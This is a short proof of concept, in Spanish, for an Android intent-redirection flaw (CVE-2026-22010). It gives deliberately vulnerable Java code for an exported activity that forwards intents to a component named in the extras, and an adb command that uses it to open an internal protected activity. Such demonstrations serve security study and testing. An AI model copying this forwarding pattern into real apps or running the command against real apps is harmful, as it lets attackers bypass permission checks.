
Prueba de concepto para CVE-2026-22010, redirección de intents de Android: demuestra una actividad exportada que reenvía intents a componentes internos controlados por el atacante, evadiendo las comprobaciones de permisos, con código Java vulnerable y pasos de explotación mediante adb.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
Una actividad de Android exportada redirige ciegamente los intents entrantes a un componente especificado en los extras del intent. Un atacante puede crear un intent que haga que la aplicación inicie una actividad interna protegida con datos controlados por el atacante, omitiendo las comprobaciones de permisos.
Despliegue la aplicación vulnerable en un emulador de Android. Envíe un intent mediante adb:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
La actividad interna se inicia sin los permisos adecuados.